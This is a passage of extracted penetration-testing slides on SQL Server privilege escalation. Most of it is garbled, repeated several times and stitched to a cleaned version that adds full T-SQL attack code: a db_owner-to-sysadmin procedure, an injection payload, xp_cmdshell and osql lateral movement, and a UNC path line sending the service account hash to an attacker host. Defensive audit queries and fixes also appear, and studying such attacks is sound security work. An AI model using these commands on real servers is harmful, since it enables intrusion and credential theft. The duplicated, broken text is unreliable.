Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation: Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login: the procedure runs in the security context of its owner, which for dbo-owned procedures is the database owner’s login
• The DB_OWNER role can create procedures WITH EXECUTE AS OWNER and so impersonate the actual database owner
Pros
• Can execute queries/commands in another user’s context
• Limits which commands and queries run in that context
• Don’t have to grant IMPERSONATE
Cons
• No granular control over the database owner’s privileges
• The DB_OWNER role can EXECUTE AS OWNER of the database, and the owner is often a sysadmin
• Requires the database to be configured as TRUSTWORTHY before the owner’s context reaches server scope (xp_cmdshell, sp_addsrvrolemember and other server-level actions)
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
Example (run as a member of DB_OWNER; MyAppUser is the caller’s own login):
USE MyAppDb
GO
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'MyAppUser','sysadmin'
GO
SYSADMIN is often the OWNER
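The db_owner-to-sysadmin path above, with the checks a tester runs before and after it and the audit query a defender uses to find exposed databases. This is an added example, not code from the original deck or from PowerUpSQL; the database name MyAppDb and the login MyAppUser are assumed, as in the slide.

```sql
-- Added example (not from the original deck). Assumed names: database MyAppDb,
-- caller's login MyAppUser, which is a member of db_owner in MyAppDb.

-- 1. Preconditions. The impersonated owner only reaches server scope
--    (sp_addsrvrolemember, xp_cmdshell) if the database is TRUSTWORTHY, and
--    the escalation only pays off if the owner is a sysadmin.
USE MyAppDb;
GO
SELECT d.name,
       SUSER_SNAME(d.owner_sid)                                AS owner_login,
       IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid))  AS owner_is_sysadmin,
       d.is_trustworthy_on,
       IS_MEMBER('db_owner')                                   AS caller_is_db_owner
FROM sys.databases AS d
WHERE d.name = DB_NAME();
GO

-- 2. A procedure that runs as the database owner and adds the caller's login
--    to sysadmin (same idea as sp_escalate_me on the slide).
CREATE PROCEDURE dbo.sp_escalate_me
WITH EXECUTE AS OWNER
AS
    EXEC sp_addsrvrolemember 'MyAppUser', 'sysadmin';
GO

EXEC dbo.sp_escalate_me;
GO

-- 3. Verify, then clean up the procedure.
SELECT IS_SRVROLEMEMBER('sysadmin') AS caller_is_sysadmin;   -- 1 on success
DROP PROCEDURE dbo.sp_escalate_me;
GO

-- Defender's audit: databases that are TRUSTWORTHY and owned by a sysadmin are
-- exactly the ones where any db_owner member can do the above. msdb is
-- TRUSTWORTHY by design, so it is excluded here.
SELECT d.name, SUSER_SNAME(d.owner_sid) AS owner_login
FROM sys.databases AS d
WHERE d.is_trustworthy_on = 1
  AND d.name <> 'msdb'
  AND IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) = 1;
GO
```

If the first query shows is_trustworthy_on = 0, the procedure still runs as the owner but sp_addsrvrolemember fails, which is the whole point of the TRUSTWORTHY caveat in the cons list. The fix on the defender side is to set the owner of application databases to a low-privilege login rather than sa, and to leave TRUSTWORTHY off.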
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation: Injection Issues
• Use signed procedures
  o Create stored procedure
  o Create a database master key
  o Create a certificate
  o Create a login from the certificate
  o Configure login privileges
  o Sign stored procedure with the certificate (re-sign after any ALTER PROCEDURE; altering the procedure drops the signature)
  o GRANT EXECUTE to the user
Pros
• Can execute queries/commands in another user’s context
• Limits which commands and queries run in that context
• Don’t have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as TRUSTWORTHY for OS command execution
Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
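The seven signing steps above carried through end to end, as an added example that is not from the original deck or from PowerUpSQL. The database MyAppDb, the low-privilege user MyAppUser (assumed to be mapped to a login already), the certificate and login names and the export path C:\Temp are all assumptions. The permission packaged here is VIEW SERVER STATE rather than xp_cmdshell so that the check at the end is unambiguous; the same steps work for EXECUTE on master.dbo.xp_cmdshell granted to a master-database user for the certificate login, with the extra caveat that a non-sysadmin caller of xp_cmdshell also needs the proxy account configured with sp_xp_cmdshell_proxy_account.

```sql
-- Added example (not from the original deck). Assumed names: MyAppDb,
-- MyAppUser, SessionCert, SessionCertLogin, export path C:\Temp.

USE MyAppDb;
GO
-- Step 1: the procedure. It exposes one fixed, server-scoped query and nothing
-- else, which is the "limit commands and queries" advantage from the slide.
CREATE PROCEDURE dbo.sp_server_uptime
AS
    SELECT sqlserver_start_time, cpu_count
    FROM sys.dm_os_sys_info;              -- requires VIEW SERVER STATE
GO
-- Steps 2 and 3: a database master key to protect the private key, then the
-- certificate that will sign the procedure.
CREATE MASTER KEY ENCRYPTION BY PASSWORD = 'Replace-This-Passphrase-1!';
CREATE CERTIFICATE SessionCert WITH SUBJECT = 'Signs dbo.sp_server_uptime';
GO
-- Step 6, done here because the certificate is at hand: sign the procedure.
-- Any later ALTER PROCEDURE silently drops this signature; re-run this line.
ADD SIGNATURE TO dbo.sp_server_uptime BY CERTIFICATE SessionCert;
GO
-- Export the public part only; master needs it to create the login.
BACKUP CERTIFICATE SessionCert TO FILE = 'C:\Temp\SessionCert.cer';
GO
-- Steps 4 and 5: a login that exists only to carry the permission. It has no
-- password, so nobody can log in as it, and it is never mapped to a person.
USE master;
GO
CREATE CERTIFICATE SessionCert FROM FILE = 'C:\Temp\SessionCert.cer';
CREATE LOGIN SessionCertLogin FROM CERTIFICATE SessionCert;
GRANT VIEW SERVER STATE TO SessionCertLogin;
GO
-- Step 7: the only thing MyAppUser receives is EXECUTE on the procedure.
USE MyAppDb;
GO
GRANT EXECUTE ON dbo.sp_server_uptime TO MyAppUser;
GO
-- Check (in a session logged in as MyAppUser's login):
--   SELECT cpu_count FROM sys.dm_os_sys_info;   -- fails: permission denied
--   EXEC MyAppDb.dbo.sp_server_uptime;          -- succeeds through the signature
-- And confirm the database never needed the TRUSTWORTHY bit:
SELECT name, is_trustworthy_on FROM sys.databases WHERE name = 'MyAppDb';   -- 0
```

The signature is what ties the permission to this exact procedure text: the certificate login’s permission is added to the caller’s token only while a module with a valid signature executes, so a db_owner member who creates a different procedure gains nothing from the certificate.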
Escalating Privileges: Impersonation
SQL Injection Example
The procedure concatenates its @DbName parameter straight into dynamic SQL, so the parameter can close the string literal and append statements of its own; when such a procedure is created WITH EXECUTE AS OWNER, as in the previous examples, the injected statements run as the owner.
CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%'+ @DbName+'%'' OR name=''tempdb'''
EXECUTE(@query)
END
GO
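How the sp_sqli2 injection turns into an escalation, beside the parameterized rewrite that closes it. This is an added example, not from the original deck; it assumes the procedure was created WITH EXECUTE AS OWNER in a TRUSTWORTHY database owned by a sysadmin, and that the attacker’s own login is MyAppUser.

```sql
-- Added example (not from the original deck). Assumptions: sp_sqli2 exists as
-- on the slide but WITH EXECUTE AS OWNER, the database is TRUSTWORTHY and owned
-- by a sysadmin, and the attacker's login is MyAppUser.

-- Attack: the parameter closes the LIKE literal, adds a statement that runs
-- as the owner, and comments out the rest. Doubled quotes are T-SQL escaping
-- inside the outer literal; the procedure receives single quotes.
-- Resulting dynamic SQL:
--   SELECT name FROM master..sysdatabases WHERE name like '%x';
--   EXEC sp_addsrvrolemember 'MyAppUser','sysadmin';--%' OR name='tempdb'
EXEC dbo.sp_sqli2 @DbName = 'x'';EXEC sp_addsrvrolemember ''MyAppUser'',''sysadmin'';--';
SELECT IS_SRVROLEMEMBER('sysadmin') AS caller_is_sysadmin;   -- 1 if it worked
GO

-- Fix: keep the value out of the statement text. sp_executesql passes @DbName
-- as a real parameter, so quotes inside it are data, not syntax. The EXECUTE AS
-- clause is kept only to show that it is not the bug; drop it if the procedure
-- does not actually need the owner's context.
CREATE PROCEDURE dbo.sp_sqli2_fixed
    @DbName nvarchar(128)
WITH EXECUTE AS OWNER
AS
BEGIN
    DECLARE @query nvarchar(max) =
        N'SELECT name FROM master.sys.databases '
      + N'WHERE name LIKE ''%'' + @pattern + ''%'' OR name = N''tempdb''';
    EXEC sp_executesql @query, N'@pattern nvarchar(128)', @pattern = @DbName;
END
GO

-- Same payload against the fixed procedure: it is treated as an odd search
-- string, no database name contains it, and only tempdb comes back.
EXEC dbo.sp_sqli2_fixed @DbName = N'x'';EXEC sp_addsrvrolemember ''MyAppUser'',''sysadmin'';--';
GO
```

The sysdatabases name in the original is the SQL Server 2000 compatibility view; sys.databases is the current catalog view, and the LIKE wildcard handling is otherwise identical.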
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server you have it on all of them
One account to rule them all
[Diagram: Leveraging Shared MS SQL Server Service Accounts. Network zones Internet / DMZ / Intranet with hosts LRA, HVA, LVA and ADS; ports 80 and 443 from the Internet into the DMZ, ports 1433 and 1434 from the DMZ into the Intranet; attacker “Captain Evil” (“PURE EVIL”). Steps: 1 SQL Injection; 2 Execute local command via xp_cmdshell; 3 Access to HVA with the shared domain service account, then execute commands and gather data from other database servers via osql. Key: HVA = High Value Application, LVA = Low Value Application]
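The three diagram steps as the T-SQL a sysadmin on the low-value server would run once step 1 (SQL injection to sysadmin) is done, followed by the check a defender runs on every instance. This is an added example, not from the original deck or from PowerUpSQL; the remote instance name HVA-SQL01 and the domain account CORP\svc_sql running both services are assumptions.

```sql
-- Added example (not from the original deck). Assumed names: remote high-value
-- instance HVA-SQL01; both instances run as the domain account CORP\svc_sql.

-- Step 2 prerequisite: whose identity do OS commands get? sys.dm_server_services
-- exists from SQL Server 2008 R2 SP1 onward; on older versions read the service
-- account from services.msc or the registry instead.
SELECT servicename, service_account
FROM sys.dm_server_services;

-- Step 2: enable xp_cmdshell (sysadmin only) and confirm the OS context.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';                -- corp\svc_sql

-- Step 3: a trusted connection (-E) from this process authenticates to
-- HVA-SQL01 as CORP\svc_sql. Ask the remote instance what that login can do
-- rather than assuming: SQL Server 2008 and earlier made the service account a
-- sysadmin at setup, later versions grant sysadmin to the per-service SID, so
-- on 2012+ the answer depends on what the administrators granted the account.
EXEC xp_cmdshell 'osql -E -S HVA-SQL01 -Q "SELECT @@SERVERNAME, SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')"';

-- If that returns 1, queries and commands on HVA-SQL01 go the same way
-- (sqlcmd takes the same -E -S -Q switches on 2005 and later):
EXEC xp_cmdshell 'osql -E -S HVA-SQL01 -Q "SELECT name FROM master..sysdatabases"';

-- Defender's check, run on every instance: Windows logins that are sysadmin.
-- The same service account name appearing here on many instances is the
-- "one account to rule them all" condition from the slide.
SELECT p.name, p.type_desc
FROM sys.server_principals AS p
WHERE p.type IN ('U', 'G')                 -- Windows logins and groups
  AND p.name NOT LIKE '##%'                -- skip certificate-based system logins
  AND IS_SRVROLEMEMBER('sysadmin', p.name) = 1;
```

The practical defences follow from the query: one managed or dedicated account per instance, no sysadmin membership for that account beyond the instance it runs, and xp_cmdshell left disabled so that step 2 at least generates a configuration change to alert on.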
Escalating Privileges: Crawling SQL Server Links
What’s a SQL Server link?
SQL Server links are basically persistent database connections for SQL Servers
Why should I care?
Short answer = privilege escalation
• The Public role can use links to execute queries on remote servers as whatever login the link was configured with (impersonation)
SELECT * FROM OPENQUERY([SQLSERVER2],'SELECT @@VERSION')
• Stored procedures can be executed (xp_cmdshell)
• Links can be crawled
[Diagram: Leveraging MS SQL Database Links. Same network layout as the previous diagram (Internet / DMZ / Intranet; LRA, HVA, LVA, ADS; ports 80 and 443, 1433 and 1434; attacker “Captain Evil”). The DMZ database server DB1 (LVA) has a DB link with least privileges to one intranet server and a DB link with the SA account to another. Steps: 1 SQL Injection; 2 Execute SQL queries and local commands on database servers via nested linked servers. Key: HVA = High Value Application, LVA = Low Value Application]
Escalating Privileges: Crawling SQL Server Links
Penetration Test Stats
• Database links exist (and can be crawled) in about 50% of environments we’ve seen
• The max number of hops we’ve seen is 12
• The max number of servers crawled is 226
Escalating Privileges: Crawling Server Links
Old Script
Released 2012: https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler
New Functions
Author: Antti Rantasaari, https://blog.netspi.com/sql-server-link-crawling-powerupsql/
Function / Description
Get-SQLServerLink: Get a list of SQL Server links on the server
